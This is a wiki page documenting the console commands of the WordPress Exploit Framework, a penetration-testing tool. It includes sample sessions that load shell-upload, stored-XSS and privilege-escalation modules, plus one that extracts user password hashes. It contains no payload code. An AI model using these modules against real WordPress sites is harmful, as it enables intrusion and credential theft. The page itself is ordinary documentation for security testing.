This repository was archived by the owner on Oct 22, 2020. It is now read-only.
-
-
Notifications
You must be signed in to change notification settings - Fork 262
Supported Commands
Rob edited this page Dec 30, 2015
·
2 revisions
Changes the context of the session back to before loading the current module.
wpxf [exploit/admin_shell_upload] > back
wpxf >
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/admin_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/admin_shell_upload] >
Clear the screen.
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wp-sandbox
[+] Globally set the value of host to wp-sandbox
wpxf > use exploit/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wp-sandbox true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/admin_shell_upload] >
Unset a global option set with the gset command.
wpxf > gunset host
[+] Removed the global setting for host
wpxf >
Display information about the currently loaded module.
wpxf [exploit/photo_album_plus_stored_xss] > info
Name: Photo Album Plus 6.1.2 XSS Shell Upload
Module: exploit/photo_album_plus_stored_xss
Disclosed: 2015-05-20
Provided by:
High-Tech Bridge Security Research Lab
Rob Carr <rob[at]rastating.com>
Module options:
Name Current Setting Required Description
------------------------ --------------- -------- --------------------------------------------------
host true Address of the target host.
http_server_bind_address 0.0.0.0 true Address to bind the HTTP server to
http_server_bind_port 80 true Port for the HTTP server to listen on
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
verbose false true Enable verbose output
vhost false HTTP server virtual host
xss_host true The address of the host listening for a connection
xss_path qdwuytOZ true The path to access via the cross-site request
Description:
The vulnerability exists due to the absence of filtration of user-supplied
input passed via the "comname" and "comemail" HTTP POST parameters to
"/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when
posting a comment.
A remote attacker can post a specially crafted message containing malicious
HTML or script code and execute it in the administrator's browser in context
of the vulnerable website, when an administrator views images or comments in
the administrative interface.
References:
http://www.cvedetails.com/cve/2015-3647
https://wpvulndb.com/vulnerabilities/7996
https://www.htbridge.com/advisory/HTB23257
wpxf [exploit/photo_album_plus_stored_xss] >
Exit the WordPress Exploit Framework prompt.
Run the currently loaded module.
wpxf [auxiliary/ultimate_csv_importer_user_extract] > run
[-] Requesting CSV extract...
[-] Parsing response...
Username Password Hash E-mail
-------- ---------------------------------- ------------------
user1 $P$B0zehiQs.vYn9ieCHPHlyumkeqW7vp1 user1@host
user2 $P$BseKx4lY7o.lB.pIsajFDkXTMPiubV. user2@host
[+] Execution finished successfully
wpxf [auxiliary/ultimate_csv_importer_user_extract] >
Set an option value for the currently loaded module.
wpxf [exploit/admin_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/admin_shell_upload] >
Search for modules that contain one or more of the specified keywords.
wpxf > search privilege escalation
[+] 2 Results for "privilege escalation"
Module Title
---------------------------------------- ------------------------------------
auxiliary/easy_cart_privilege_escalation EasyCart Plugin Privilege Escalation
auxiliary/wplms_privilege_escalation WPLMS Theme Privilege Escalation
wpxf >
Show the options or advanced options for the currently loaded module.
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host wp-sandbox true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/admin_shell_upload] >
wpxf [exploit/admin_shell_upload] > show advanced
Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)
Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections
Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)
Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)
Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests
Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS
Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.
wpxf [exploit/admin_shell_upload] >
Unset an option set with the set command.
wpxf [exploit/admin_shell_upload] > unset host
[+] Unset host
wpxf [exploit/admin_shell_upload] >
Loads the specified module into the current context and enables the show, info, set, unset, check and run commands.
wpxf > use exploit/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>
wpxf [exploit/admin_shell_upload] > show options
Module options:
Name Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host true Address of the target host.
http_client_timeout 5 true Max wait time in seconds for HTTP responses
password true The WordPress password to authenticate with
port 80 true Port the remote host is listening on
proxy false Proxy address ([protocol://]host:port)
ssl false true Use SSL/HTTPS for all requests
target_uri / true Base path to the WordPress application
username true The WordPress username to authenticate with
verbose false true Enable verbose output
vhost false HTTP server virtual host
wpxf [exploit/admin_shell_upload] >